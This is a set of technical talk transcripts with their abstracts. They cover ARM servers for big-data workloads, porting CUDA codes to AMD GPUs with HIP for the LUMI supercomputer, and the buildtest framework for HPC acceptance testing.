And in Equinex Metal, previously known as Packet Cloud, the ARM bare metal server can provide up to 15% decrease in the expenses, and that's a lot of money. But money is an only thing users care so about, that's for sure. So let's look at the performance. There are some methods that users can add their ARM nodes to their existing X86 Hadoop cluster. If you does not want to mix them up, you can use the node label expression feature to mark those nodes into different groups and arrange jobs that are more suitable for different types of CPUs. But of course, you can also add the ARM nodes to the existing deployments directly. Just to be aware of that there might be problems, let's the math library I mentioned above in a mixed deployment. In our case, we did not use the labels, and we added the ARM nodes to the cluster directly. We have deployed four clusters with identical hardware, but we are replacing the X86 worker one by one to see how it will affect when we introduce ARM nodes to the cluster. We used a typical 50GB Sterasot benchmark for the comparison. We run a job for each cluster for 10 times and calculate the average. From the results, we can see that in general, with more ARM nodes replacing the X86 nodes, there are some attenuations in the overall performance. The overall attenuation is about 8% if replaced all three workers with ARM nodes. This is because the per core compute power for ARM is still weaker than X86. When we look at the price, we can see that adding ARM to the cluster brings about 25% of the money saving and combining two angles. I think ARM data center looks attractive. I have to mention that these tests are done in the default configurations of the cluster and the job. It's for demonstration purpose. There are many parameters that can be tuned for both software and hardware to make the performance better. If you are interested, you can also test it out with the servers provided by the previous mentioned cloud providers. Besides big data, our team have also contributed to a lot of open source projects in different layer of the software stack, including operating systems, libraries, cloud computing, middle veers, databases, web and AI. Here is the link to our tech blog and Slack channel. We have summarized some of our works on the blog. Feel free to read and comment. Some of them are still in Chinese, but we are working on translating them. If you have any questions or problems on porting projects on ARM platform, or you are also interested in promoting ARM platform in the open source world, feel free to contact us in the discussion section of the blog or through the Slack channel. Thank you for your time.
|
Currently, there are more and more ARM based datacenter hardware options on the market, and their performance has been continuously improving. Thus more and more users and customers are starting to consider using these datacenter hardware options for their business. Big Data is one of the most important areas. On the contrary, the open source ecosystem for Big Data on ARM is not that perfect: most of the software in the Big Data ecosystem does not care too much about running on ARM in advance, or developers have not officially tested their codes on ARM, and there are a lot of unsolved problems. In order to make those software solutions able to run on ARM, one has to search and read tons of articles and to do a lot of patches and build a numbers of dependencies on their own. And once the upstream changes or upgrades, there might be new problems since it is not tested on ARM in upstream. All these challenges made users concerned to use ARM for their business. In order to change this situation and make the Big Data open source ecosystem more friendly to ARM platform and its users, our team started by proposing adding ARM CI to those open source projects. By doing this, the projects will be fully tested on ARM and also all future changes will as well be tested on ARM. In the process, we fixed a lot of problems directly in upstream, which benefits all users. And then, we started to perform performance comparison tests between ARM and x86, to give users an overview of the status. And there are also large numbers of TODO items, for the future. In this session, you can learn the current status of ARM CI for Big Data ecosystem projects like Hadoop, Spark, Hbase, Flink, Storm, Kudu, Impala etc. and our efforts on fixing ARM related problems. We will also introduce our future plans.
|
10.5446/53660 (DOI)
|
Hello, my name is George Markomanolis. I'm a lead HPC scientist at CSC, and I'm here to present to you about getting started with AMD GPUs. The outline: the motivation, a few words about LUMI, an introduction to ROCm and to porting codes to HIP, benchmarking, Fortran and HIP, some differences, and tuning. The disclaimer: the AMD ecosystem is under heavy development, and many things can change without notice any week or month. All the experiments took place on NVIDIA V100 GPUs on the Puhti cluster at CSC. I try to use the latest versions of ROCm; maybe by the presentation there will be a newer version. And some results are really fresh and we are still investigating the outcome, so there are some small challenges. Now about LUMI, the Queen of the North, a new EuroHPC system; it is a consortium of many countries that are part of this project. You can see how many partitions there are here: the LUMI GPU partition with AMD GPUs; the x86 CPU-only partition for applications that cannot really use GPUs; data analytics; a high-speed interconnect; various storage systems depending on the needs; and a classic parallel file system of 80 petabytes. And this will be installed this year in Finland, so that's why we are getting ready for this infrastructure. About the motivation and challenges: LUMI will have AMD GPUs, that's why we need to know how to program them and learn about the ecosystem. We plan to provide training to LUMI users, probably the first one coming at the end of February, and we are investigating possible future problems, so we want to find issues that users may have. We don't have access to AMD GPUs yet, so that's an issue; for now we work basically on NVIDIA GPUs. Here is a small example of the MI100 architecture, and you can see it has 8 shader engines that are made up of compute units. Each shader engine has 16 compute units (about 8 compute units are disabled in total), and each compute unit has 64 stream processing cores. So basically the GPU command processor breaks kernels down into blocks and dispatches them to compute units. One compute unit can execute many blocks, threads from one block use the same compute unit, and a kernel can have more blocks than the compute units can fit. 64 threads constitute a wavefront, this is the terminology on AMD, while on NVIDIA a warp consists of 32 threads. And you can see here in the middle the ACEs, the asynchronous compute engines, the HWS for the hardware scheduler, and the DMA engines for asynchronous data transfers between GPU and host or between GPUs, and here the fabric to connect with the other GPUs or with the host, some memory controllers, etc. Differences between HIP and CUDA: I mentioned already that wavefronts have a size of 64 threads while warps in CUDA have 32. Some CUDA library functions do not have AMD equivalents, and the shared memory and registers per thread can differ between AMD and NVIDIA hardware. Now, ROCm is an open software platform for GPU-accelerated computing by AMD, and it has many layers. We start with the supported GPUs: you can see a list of supported GPUs; of course more will be added and some others removed when they become older. We have the device driver, which is basically the ROCm GPU kernel driver and supports some Linux distributions, and the thunk interface, which provides a user API for the driver. Then there is the system runtime for low-level manipulation, which handles all the layers below. The main programming frameworks from AMD are HIP and OpenCL, and we talk about HIP in this presentation.
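Before moving on, a quick back-of-the-envelope check of the MI100 numbers just quoted (assuming the eight disabled compute units are counted across the whole chip, which is how the MI100 is usually described) gives the total core count:

$$8 \text{ shader engines} \times 16 \text{ CUs} = 128 \text{ CUs}, \qquad 128 - 8 = 120 \text{ active CUs}, \qquad 120 \times 64 = 7680 \text{ stream processors.}$$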
Libraries: with the libraries there is something easy to remember. When a library is called roc-something, then it is for AMD hardware; when it is hip-something, then it can run on both AMD and NVIDIA. That's really a nice feature, and there is also hipfort, which we will discuss a bit, and then the machine learning stuff. Application frameworks: PyTorch, TensorFlow, Caffe, etc. And development and management tools: rocprof and roctracer for profiling and tracing, rocm-smi like nvidia-smi, some debugging agents, etc. And there are many more that are not presented here. Now, the ROCm installation consists of many components: ROCm CMake, which provides some CMake files; the thunk interface that I mentioned, the API to the driver; the runtime API, which provides handles for the lower layers; ROCm LLVM and Clang, basically the compiler that is used behind the scenes in many cases; rocminfo, which provides information about the hardware; ROCm Device Libs, a device-side library for some languages; ROCm CompilerSupport, which is basically there to analyze objects; and then the ROCm OpenCL common language runtime, along with HIP. I also have, here in the repository, instructions on how to install all of these; a script automates the procedure, and this is also the repo that I'm using for this talk. And now an introduction to HIP. HIP is the Heterogeneous-compute Interface for Portability. It was developed by AMD to program AMD GPUs. It is a C++ runtime API and supports both AMD and NVIDIA platforms. HIP is similar to CUDA, and there is no performance overhead on NVIDIA GPUs, or only a minimal one in some cases. Many well-known codes have been ported to HIP, and of course there are plenty more. New projects, or ports from CUDA, could be developed directly in HIP, because with HIP you can run on AMD or NVIDIA, so this gives you portability. And here is the repository where to find HIP. Now, the differences between the CUDA and HIP APIs. You can see the two columns here: for example, here we have cuda.h and here we have the HIP API, and all the CUDA calls, cudaMalloc etc., are converted to hipMalloc, hipMemcpy, hipDeviceSynchronize. So you can see a clear one-to-one mapping between the calls. Launching a kernel with CUDA and HIP is a bit different. In CUDA we give the kernel name, the grid size (the number of blocks to launch), the block size (the number of threads per block), the shared memory size (additional shared memory to allocate) and the stream to be used, and then the arguments. In HIP you add the call hipLaunchKernelGGL and then you take all of this and put it inside: kernel name, grid size, and so on in the same order. As you can see it's really similar; it's a small difference. The HIP API has device management, hipSetDevice, hipGetDevice etc., which is useful for GPGPU work; memory management, hipMalloc to allocate memory, hipMemcpy to copy memory, asynchronous memory copies, etc.; streams to create, synchronize and free; and then calls to create events, record events and others. Then you have the __global__ and __device__ qualifiers; threadIdx, blockIdx and blockDim work the same as in CUDA; you have shared memory; hundreds of math functions covering the CUDA math library; and error handling, hipGetLastError and hipGetErrorString to display the message. And here is the full API; this is really only a small part of the full API. Now, the hipify tools, which convert the CUDA code.
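Before moving on to those tools, here is a minimal sketch of the launch-syntax difference just described. This is a generic vector-add kernel of my own, not one of the codes from the talk; the kernel body itself is identical for CUDA and HIP, and only the launch line changes:

```cpp
#include <hip/hip_runtime.h>  // with hipcc this also works on NVIDIA, where it maps to the CUDA runtime

// Simple vector addition kernel: the source is the same for CUDA and HIP.
__global__ void vector_add(const float* a, const float* b, float* c, int n) {
    int i = blockIdx.x * blockDim.x + threadIdx.x;  // threadIdx/blockIdx/blockDim behave as in CUDA
    if (i < n) c[i] = a[i] + b[i];
}

// Launch helper: grid, block, shared memory and stream are the same pieces of information in both APIs.
void launch_vector_add(const float* a, const float* b, float* c, int n) {
    dim3 block(256);
    dim3 grid((n + block.x - 1) / block.x);

    // CUDA launch syntax (when compiling with nvcc):
    //   vector_add<<<grid, block, 0 /*shared mem*/, 0 /*stream*/>>>(a, b, c, n);

    // HIP launch syntax: the same information is passed as the leading arguments.
    hipLaunchKernelGGL(vector_add, grid, block, 0 /*shared mem*/, 0 /*stream*/, a, b, c, n);
    hipDeviceSynchronize();
}
```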
It's possible that not all of the code is converted; the rest is up to the developer to implement, that's normal, but hopefully most of the code will be converted. hipify-perl is a text-based search and replace; hipify-clang is a source-to-source translator that uses the clang compiler, so it does the compilation as well. There is an extensive porting guide here from AMD, and we will continue with hipify-perl. It can scan directories and it converts CUDA code by replacing CUDA with HIP, like this, and it is reasonably clever; comments, for example, will not break it. So the example I give you here: if filename is a source code file and I run hipify-perl with this argument, then the file gets converted; the original file is kept as filename with the extension .prehip, and filename itself becomes the HIP version. So the original code becomes filename.prehip, and this is really nice because you keep the original code while filename becomes HIP. Now, if you want to convert a whole directory full of files, you give the directory as the argument instead of the file, but you use hipconvertinplace-perl.sh. With this command it will do the same job, but for a directory: you convert all the files that are located inside the directory. Here I do a listing in this directory and I see the original files. Then I ran hipconvertinplace on this directory, and now you can see that the .c file is HIP and the .c.prehip is the original file, and likewise .h and .h.prehip. If you want to change something in the original code, you change the .prehip files and then you execute the command in step two again. No compilation takes place, just conversion. hipify-perl will then report on each file, and it looks like this; I have minimized it. It says it converted a total of 53 CUDA calls to HIP, and it gives the category each of these calls belongs to, how many lines of code, and which calls you will now see in the code. So you can see hipFree, HIPBLAS_STATUS_SUCCESS, and how many of each of them. Now here we see the output of hipify-perl, the new code created here. The original code has cuBLAS calls in it, and hipify-perl is clever enough to understand that we need hipBLAS, so it includes the hipBLAS header here. And as you can see, all the CUDA calls are now HIP calls here; even the older call here now becomes hipblasDestroy, because this is how it works in the hipBLAS library. So you can see it side by side for comparison. Now, if we compile the application with hipcc at this point, we will get an error that hipBLAS doesn't exist. That's normal, because we have not installed hipBLAS. So we install hipBLAS, and you can see down in the repository how to install it, and then we can continue and get past this point. Just to mention here that when HIP is used on NVIDIA hardware, you should include the option -x cu with hipcc, so that every such file is basically handled like CUDA and can contain CUDA API calls. This is the way to compile .cpp files directly on NVIDIA hardware with HIP; otherwise it can fail. So hipcc uses nvcc on NVIDIA GPUs and hcc for AMD GPUs. hipify-clang: here you can build it from source, and it creates the output directly, without the intermediate hipify step. Sometimes you need to include the headers manually with -I, and in this example I take a .cu file with one CUDA call and I added the --print-stats argument myself.
You don't need to do that yourself. And you see the statistics for the code: how many lines of code changed, the total lines of code, the percentage, how many seconds it took, etc. It's nice to see this information laid out like that. Now for benchmarking. The first application, with OpenMP offload: we found the benchmark on GitHub, and the size is 2000 by 2000. All the CUDA calls were converted, and it was linked with hipBLAS along with the OpenMP offload. And here you can see the results of CUDA and HIP. You can see it's almost one teraflop; you can see that CUDA is a bit higher than HIP, and this value is the total flops of the whole application, the whole benchmark, while here it is only for the kernel. So you can see that for the kernel, HIP is a bit higher than CUDA. And this is single precision, so the peak is 15 teraflops and they achieve almost 12. And here you can see that in total there is around 2.23% overhead for HIP using NVIDIA GPUs, but this is really a great result, and for the kernel it is even better. These experiments were run 10 times, to see that it always comes out the same. And for the particle simulation: basically I wanted to find another code that I had no idea about, and I found this one, and I used the all-pairs and tiled kernels. 171 CUDA calls were converted to HIP without issues, around 1000 lines of code in total. I just showcase the HIP calls; I don't need to read them, but you can see that some of them are visible. There were more than 32,000 particles with 2,000 time steps. The CUDA execution time was 68.5 seconds and the HIP one was 70.1 seconds, an overhead of 2.33%, which is extremely low and good. And I also repeated the experiments enough times. Now about Fortran: we have two scenarios. The first one is Fortran plus CUDA in C/C++ files, where the Fortran does not include any CUDA calls in the Fortran files. In this case we can hipify the CUDA with the tools automatically, and compile and link with hipcc and the Fortran compiler. The second scenario is CUDA Fortran, and there is no HIP equivalent, so HIP functions are called from Fortran using extern C interfaces, and we will see hipfort on the next slide. About hipfort: it is a Fortran interface library for GPU kernels. You can find the repository down at the asterisk. And there is some effort involved in how to port CUDA Fortran calls to Fortran with HIP. The hipify tools do not support this. So we put the kernels in a new C++ file, wrap each kernel launch in a C function, and use the Fortran 2003 C binding to call the function, and we need interfaces to be declared for the functions. Also, from the hipfort side the syntax could change in the future, so we will see if there is a different direction. And of course you can use OpenMP offload to GPUs, because porting to HIP can take more effort, so it depends on the application, the performance achieved, etc. We have a CUDA Fortran example: SAXPY, single-precision A times X plus Y. The original file was 29 lines of code, and when I ported it manually to HIP it was 52 lines, so more than 20 new lines; that's a lot of work for such a small code. So someone may ask: should we try OpenMP offload before we try HIP? This depends on your expertise and what performance you want to achieve, as HIP theoretically has fewer layers. You just need a Makefile to compile the multiple files, and there is a Makefile from hipfort that helps a lot. And the interesting part was that the HIP version is up to 30% faster compared to the CUDA Fortran one, which is basically nvcc vs. the PGI compiler, which is a bit interesting and strange.
So we are still checking the results, and there are some interesting outcomes: when we use optimization flags, the PGI version is faster than the HIP version, so there is something going on there with the optimization flags, the code generation and so on. An example of Fortran with HIP you can also find here. Usually I don't like to have code in my slides, but here on the left I show you the original CUDA Fortran as it is, and in the middle is the new Fortran 2003 with HIP, where you can see in the box the interface declared for the launch function and the arguments that need to be passed, because you have to pass all those pointers into the function. You see the code here, some HIP calls, hipMalloc and hipMemcpy, and we use hipCheck, also provided by hipfort, to check whether something failed or not in those calls. And on the right is a C++ file with HIP and extern C, and you can see here the launch in the box, the launch routine whose interface is declared in the Fortran file. So the launch is called with the parameters, I declare the grid and the block here, and I call the kernel with hipLaunchKernelGGL and launch the kernel, and that's how it works for now with HIP in Fortran. Now, AMD OpenMP: this is the LLVM OpenMP offload, and it gets improved over time; we have done early AMD OpenMP trials. There are still performance issues, it gives a bit lower performance than HIP, but AMD is improving it, and we hope that by the delivery it will be in really great shape. You can also find it at this link here on GitHub. OpenMP or HIP? Some users will be wondering about the approach. OpenMP can provide a quick porting, but you need to be careful about data transfers and overhead, and you need to profile. With HIP maybe you get better performance, as we avoid some layers, but you need to program more. So it depends on you: for complicated codes and programming languages such as Fortran, OpenMP probably provides a fast benefit, but again it is a personal decision and depends on how much time you have to investigate the code. Porting codes to LUMI: this is an internal diagram, it is not official, so it is just for discussion. The diagram says that if the parallel code is without GPU support, you can try some libraries like Alpaka, SYCL, etc. Depending on your programming language, or if you are experienced, you can go directly here and decide on HIP porting: for C/C++, go here and do profiling to identify the kernels and port them to HIP; or here, for Fortran, profile, identify the kernels, use hipfort if necessary, prepare the kernels according to the instructions for Fortran and port them to HIP. If you are here and you are not really an expert in going to HIP directly, you can ask: does the code have OpenMP? If yes, port it to OpenMP offloading to GPUs; if the performance is good, perfect, and if the performance is not good, then probably go here and check the OpenMP code to tune it, with different pragmas and data transfers, and if it is still not good, then consider HIP, as we discussed before.
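As an aside, here is a minimal sketch of what the C++ side of the Fortran-plus-HIP SAXPY described above might look like. This is my own illustrative version, not the code from the slides; the Fortran side would declare a matching iso_c_binding interface for launch_saxpy and pass device pointers, for example obtained through hipfort's hipMalloc bindings:

```cpp
#include <hip/hip_runtime.h>

// SAXPY kernel: y = a*x + y, single precision.
__global__ void saxpy_kernel(int n, float a, const float* x, float* y) {
    int i = blockIdx.x * blockDim.x + threadIdx.x;
    if (i < n) y[i] = a * x[i] + y[i];
}

// C-callable wrapper so that Fortran can launch the kernel through its iso_c_binding interface.
extern "C" void launch_saxpy(int n, float a, const float* x, float* y) {
    dim3 block(256);
    dim3 grid((n + block.x - 1) / block.x);
    hipLaunchKernelGGL(saxpy_kernel, grid, block, 0 /*shared mem*/, 0 /*stream*/, n, a, x, y);
    hipDeviceSynchronize();
}
```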
Now, if the application already has GPU support, you can again go and rewrite it with the new libraries; we are not sure yet what will be supported, but we hope they will be supported, and if that works well, great. Otherwise you have to choose: hipify the kernels, or, if it is Fortran, use the Fortran approach. Again, if the performance is good, great; if not, fix the code, convert manually whatever was not converted by hipify, and of course use the HIP libraries that are available. If it uses OpenACC, OpenACC will be supported through GNU; then if the performance is good, great, otherwise think about porting to OpenMP offloading to GPUs. So yes, it is a bit of a complicated diagram, but slowly you can catch up and choose your direction, and maybe there are even more directions. Now, profiling and debugging: AMD will provide APIs for profiling and debugging, Cray supports the profiling API through CrayPat, and some well-known tools are collaborating with AMD and preparing their tools for profiling and debugging. Some environment variables, such as AMD_LOG_LEVEL=4, will provide extra information. More information about a hipMemcpy error, for example, looks like this: you take the error into a variable and you print it with hipGetErrorString, and it describes with a really human-readable message what it is about. Now tuning: multiple wavefronts per compute unit are important to hide latency and extract throughput. Memory coalescing increases bandwidth, as always, and unrolling loops allows the compiler to prefetch data. Small kernels can cause latency overhead, so adjust the workload accordingly, and make use of local memory. The Local Data Share (LDS) is a user-managed cache that enables data sharing between threads that belong to the same thread block. It is similar to shared memory on NVIDIA, and it is on the order of a hundred times faster than going to global memory. Programming models: we already mentioned that OpenACC will be available through GCC, as Mentor Graphics, now called Siemens EDA, is developing the OpenACC integration. Kokkos, Alpaka and SYCL should be available to be used on LUMI, but they do not support all the programming languages, so you need to be careful about this aspect. Depending on the code, the port to HIP can be quite straightforward; we have had applications that were ported and ran without problems. Of course there can be challenges, depending on the code and on which CUDA functionalities are integrated into an application, so this depends on what HIP supports, but AMD is working on it. There are many approaches to port the code, and you should select the one that you are most familiar with and that provides as good performance as possible. Of course it also depends on the time that you have available. It will be required to tune the code for higher occupancy of the GPU; this is the classic approach. Always profile, to investigate data transfer issues among other things, and there will be some nice tools on LUMI as well. And probably for small projects, try OpenMP offload to GPUs, especially with Fortran codes, if there is OpenMP in the Fortran code of course, because there is some extra effort in moving Fortran codes to HIP. That's all for now. I would like to mention the HIP 101 "porting CUDA codes to HIP" training organized by CSC. The registration deadline is 15 February and for now it is open to the LUMI consortium. Thank you, and I'm up for any questions.
|
LUMI is a new upcoming EuroHPC pre-exascale supercomputer with peak performance a bit over 550 petaflop/s. Many countries of LUMI consortium will have access on this system among other users. It is known that this system will be based on the next generation of AMD GPUs and this is a new environment for all of us. In this talk we discuss the AMD ecosystem, ROCm, which is open source and available on github. We present with examples the procedure to convert CUDA codes to HIP, among also how to port Fortran codes with hipfort. We discuss the utilization of other HIP libraries and we demonstrate performance comparison between CUDA and HIP on NVIDIA GPUs. We explore the challenges that scientists will have to handle during their application porting and also we provide step by step guidance.
|
10.5446/53661 (DOI)
|
My name is Shahzeb Siddiqui. I work at Lawrence Berkeley National Lab, and today we'll be talking about buildtest. It's an HPC testing framework for facilities to run acceptance tests. buildtest is an open source project; it can be found on GitHub. And on the right is the documentation; it's at buildtest.readthedocs.io. buildtest is implemented in Python. It's a framework for facilities to run acceptance tests for their system. Typically, this will be for the HPC staff to run acceptance tests frequently, for instance during a maintenance outage or on a daily or weekly basis, where they would run tests to monitor different parts of the system. Typically, you will write these tests in YAML when using buildtest, and these tests are validated through JSON schemas. buildtest will automatically create the tests and execute them on your system. buildtest is not a replacement for build tools like Make or CMake, and it's also not a software build framework responsible for installing software. While its goal is to test various components, including the software, that's not its primary role. In buildtest, we will cover a bit of terminology. First, a buildspec is the YAML file in which you will write tests. YAML is pretty easy to get started with, and buildtest will take that buildspec and actually generate a shell script and run it. These buildspecs are validated through JSON schemas. We have a global schema, which is a JSON schema that defines the top-level structure of the buildspec, and this global schema is validated for all buildspecs. We also have a sub-schema that validates a test instance of the buildspec, and this sub-schema is looked up through the type field. These sub-schemas are also versioned schemas, and every test is only validated with one sub-schema. The buildspecs are executed using an executor, which is responsible for running the tests. These executors are defined in your configuration file. The executors can typically be a local executor or a batch executor. In version 0.8, last year, we introduced JSON schemas. These JSON schemas are responsible for validating the buildspec. This was a core change to the buildtest framework, primarily led by Vanessa. The concept was to change the validation process from our own implementation to using the JSON schema library. So we write the JSON schema, and we have regression tests against the schema with example valid and invalid tests for each schema. The JSON schemas are also published on GitHub Pages; we have a workflow that automatically creates markdown pages from the schemas. On the right is an example of the compiler schema. It shows you all the properties available, and it's useful to reference this documentation if you're going to write your buildspec. The schemas are also versioned, so this allows future development of the schema while retaining backwards compatibility. In buildtest, you will use the buildtest build command to build your tests. You can specify a file using the -b option, which can be a relative or an absolute path. You can also specify a directory, which will find all buildspecs, the .yaml files, in that directory, and it will make sure that all the files are valid. If the file doesn't exist, then it will just exit. You can also repeat the -b option, so you can have a file or directory and it will find all the tests. You can also build tests using tags. So imagine you want to run, let's say, all benchmark tests.
You can have a tags name corresponding to a string and build tests will find all the tests corresponding to the tag and build them. You can mix between the dash B and the dash tags option. You can also exclude files using the dash X. And this works on files and directories. And it can be appended multiple times. You can also build by executor. So imagine you want to run all tests that correspond to the executor. Oftentimes these executors are associated to a queue in your system, a batch queue system. In this example, we show a typical build. This is, we have a single build spec of a Python hello example. First, we will discover the test. Since this is a file, it will be only one test. You will get validated with the schema. In this example, it's using the script version 1.0 schema. Next, it will build the test. It will tell you that the name of the test is Python hello. It will generate a unique test ID and generate the shell script. The shell script is run using the executor. You will get this return code and a status message, typically a pass or fill to indicate if the test passes. And also build by tags. Tags is going to take a string value, arbitrary string. In this example, we're using a tag name called pass. You'll find that there's one build spec that corresponds to that. And it will run all the tests within that build spec. In this example, the build spec had four tests. And it will run. Now we'll cover the general pipeline. For every discovered build spec, build test typically goes through a five stage pipeline. And it will first parse the build spec with the JSON schema. This includes the global and the sub schema. Next, it will build the test, which includes generating a valid shell script. And then it will run the test from the YAML file. And that's the core part of build test, which actually auto generates the shell script. Next, it will run the test. It could be either an exit local or batch executor. This is defined by the executor property in the build spec. And depending on how it's run, we'll gather the results. If it's run locally, it's, it's, it's just means running the test and gathering the output and error file and return code. If it's through a queuing system, then we submit the job, pull for the job, get the results through the queue system. And finally, we update the report. And internally in build test that we can post, we can process the results. In this diagram, we, we cover the validation process of a build spec. As I mentioned, the build spec is validated with a global schema and a sub schema. And this diagram shows exactly how that's done. We have an input build spec. The test is called Hello World. It's a, it's a property within the build spec. The, the first part of the validation is the global schema validation. We use the version, the build specs and the maintainers field version and build specs are required fields. Maintainers and optional field. The version and the type field are a look of fields to find the sub schema. Since the sub schemas are a version one dot oh, we use a version and the type. And we find that it's a script version one dot oh schema that we need to use to validate the test. In this example. We show how this validation works. If the, if the build spec is not valid, it will be skipped. In this example, we show the build spec structure. So the version and the build spec are required fields version defines the schema version you want to use those spec is the declaration of one or more tests. 
The test in this example is the systemd default target; you can name it anything you want, and that name will show up in your test, in the output of the buildtest build command. The executor is responsible for running the test, and this is important for how you want that test to be run: local.bash means running the test through the bash shell locally. The type is also a required field; it tells you which schema to use. You can specify a description of the test, and you can specify the tags you want; those will be used with the buildtest build --tags option if you want to build this test. And then the run section actually specifies the script; in this example it is testing whether multi-user.target is the default target. Typically, a test with a return code of zero is a pass, but sometimes you will want a different return code match; for instance, if you're going to run some kind of failure test, you may want to match a return code other than zero. We have four tests in this example. The first test is an exit-one fail: it will fail because exit 1 is non-zero. The second test is an exit-one pass: we get an exit 1, we're expecting an exit 1, so this will pass. In the third test, we have an exit 2, but we're expecting a 1 or a 3; we can have a list of different return codes to match, and this will fail because 2 is not in the list. In the last example, we get an exit 128 and we match it with 128, so this one passes. We can customize the shell using the shell property. By default, the tests are run in /bin/bash, but you can use the system-provided /bin/bash, /bin/sh, csh, tcsh or zsh. We can also use Python, and you can also add additional options to your liking. This all affects the script schema when you're writing the tests. Python shell support can be enabled using the shell property, and this will allow you to write Python code using the script schema. All you need to do is specify python in the shell and change the executor to local.python, and then the run section is used to write Python code. This is a simple example of calculating the radius and the area of a circle. If you want some more complex Python scripts, you can bring your own Python code and invoke it using the bash or sh shell. In buildtest, we support Slurm, LSF, and Cobalt. We have scheduler-agnostic configuration using the batch property. In this example, we're going to submit a job with one node, one CPU, five minutes and five megabytes. The batch property for this one is going to use the Slurm parameters, because this test will use a Slurm queue. The batch property only implements a subset of the features that are shared between the schedulers; it's not intended to implement all the features, because not all the features are applicable. For example, if you had a test that used the qos field, this would be valid in Slurm, but if you were going to run the same test on LSF or Cobalt, you would not have this field; therefore, buildtest will just ignore that field during the test generation. We also support the Cray burst buffer and DataWarp on Cray systems, where you typically use the #BB and #DW directives. So in buildtest we have properties called BB and DW that map to these directives. In this example, we're creating a persistent burst buffer called data buffer, of size 10 gigabytes and with striped access. This test is run on a KNL node.
All we do is go into the burst buffer and create a random five-gigabyte file, and as you can see in the output on the top right, this random.txt was created in the burst buffer. In order to switch to the burst buffer, we have to cd into the DW_PERSISTENT_STRIPED path followed by the name of the buffer, and then create the file there. One thing to also mention is that since this is a persistent burst buffer, it will be visible when you do scontrol show burst. Now we'll talk about the compiler schema. This is the other schema that we support, for writing and running single-source compilation tests. This test will use the GCC 10 and GCC 9 compilers. Compilers are defined in your configuration file, and you can retrieve them using buildtest config compilers. In this example, we have three compilers: the builtin GCC and the two GCC compilers. For the compiler schema you need to specify a source file, which is a path relative to the buildspec. compilers is the start of the compilers block, where you define how to search for compilers using the name property, and this property is a list of regular expressions to search for compiler names. You define the default section, which is organized by compiler groups, for the compiler configuration. For instance, in this example we have the gcc compiler block where we define the cflags and ldflags for compiling this code. We can also override the compiler defaults: in this example we have a hello world in C, and we're going to search for compilers with the regular expression, anything that starts with builtin gcc or gcc. The default is -O1 for compiling with all the GCC compilers, but in the config section we can override the configuration, and this is organized by the compiler names. In this example, we specify that GCC 9 will use -O2 and GCC 10 will use -O3. If the test doesn't pick up a compiler based on the regular expression, then whatever is in the config section for it will just be ignored. For instance, if you specify GCC 9 in your config but it wasn't picked up, it will simply be ignored and the test won't be created for it. We can also build a single test with multiple compilers. This is an example of an OpenMP reduction example using the GCC, Intel and Cray compilers. The regular expression matches any compiler that starts with gcc, intel or PrgEnv-cray, because that's how the compilers are defined on Cori. We're going to use a new field called all in the default section, which is configuration that's shared for all compiler groups; any property that you see in the all section is also available in each of the compiler groups. In this example, it is used for declaring environment variables; the same property is available in each of the compiler groups, and it will be overridden there. In this example, we're going to use four OpenMP threads, and each of the compiler groups will compile this code with the OpenMP flag. As you can see in the test, this single reduction test was actually built with all the GCC, PrgEnv-cray and Intel compilers. Next, an MPI Laplacian code is built and run on a KNL node. We're using the Intel 19 compiler. We can also specify sbatch options; this is available in the all section, and they basically map to the #SBATCH directives. This property is also available in each of the compiler groups. And also, since this is an MPI code, we run this test through srun; this is the recommended way in Slurm.
That is specified in the run property. And this code is compiled with the MPI wrapper, so we can use the cc property to specify which compiler wrapper to use; with Intel MPI we can use mpiicc. We can also specify how to load and swap modules. So, in order to use Intel MPI, we're going to load the Intel MPI 2020 module. We also need to swap modules on Cori: the default module on Cori at login is a different version of Intel, so we can specify how to swap modules. As you can see in the generated test, the modules are loaded first and then swapped. Now we'll talk about some other features in buildtest, including the buildspec cache. We can use buildtest buildspec find to load all the buildspecs into the cache, and you can then filter and format them using the --filter and --format options. The filter option expects a key-value pair, and you can specify multiple key-value pairs separated by commas. On the top right is an example where we find all tests with a filter on the tag name: we search for all the tags with the value fail, and we find that there are two tests. We can also change the format of the columns using the format option; in this example in the middle, we format by the name and the tags, and as you can see it changes the columns. And we can also have a multi-key filter. So, in the example on the bottom right, we can filter all the tests by the tags equal to tutorial, the tests that use the local.sh executor, and that use the type script. We support multiple filter fields and format fields; you can find them using the --helpfilter and --helpformat options. Now, whenever you run a test, it is stored in a JSON file for post-processing. You can use the buildtest report command to display all the test results, and they can be queried using the filter and format options; it's very similar to the buildspec feature that we discussed in the previous slide. The filter option is also a key-value pair, you can specify multiple filter arguments separated by commas, treated as a logical AND, and the format option alters the columns. In the example on the bottom left, we filter by the test name exit one pass; name is a key of the filter option that tells buildtest to filter by the test name, and these test names are specified in your buildspec file. In the example on the bottom right, we can also filter by return code; so imagine you want to find all the tests that have a return code of, let's say, two: it will find them for you. And we can also format by columns; in this example we format by name, ID and return code. We can also filter by multiple filter fields: in this example we filter by state, all tests that fail, and that ran on the local.sh executor, and this filter uses a logical AND. Now we'll talk about some of the tests that we have in the Cori test suite; you can find them in the link below. We try to test several components of the Cori system, including file system checks, basic system configuration, and network tests like, you know, pinging the login nodes and data transfer nodes, SSH connections, and making sure the name servers are up. We use Slurm, so we make sure that basic Slurm commands like sinfo and scontrol work, and that the Slurm controllers are available and the partitions are there.
We also have two different Slurm clusters, so esslurm is another of our clusters, and we make sure that we can submit jobs to both clusters. We make sure that we can submit to all the queues, that we can create a burst buffer, and that we can stage in and stage out from the burst buffer. And we also have a list of failing jobs that test different Slurm configurations, like time limits and max nodes for the queues. On the application side we have OpenACC, OpenMP, MPI and MKL; for containers we're using Shifter, so we make sure that Shifter can pull images and run Shifter through a job. And we also have the E4S test suite, which is the Spack stack, for testing. This is an example of testing the SSH connection, ping and uptime of our login nodes and data transfer nodes: we have 12 Cori login nodes, 01 to 12, and data transfer nodes 01 to 06; we make sure that we can ping them, that we can SSH into them, and that we can run remote commands against them. And we have some resources to get you started. If you just want to get started, there are the schema docs and the installation guide. And yeah, if you need help, please look at the slides and join the Slack channel. Thank you.
|
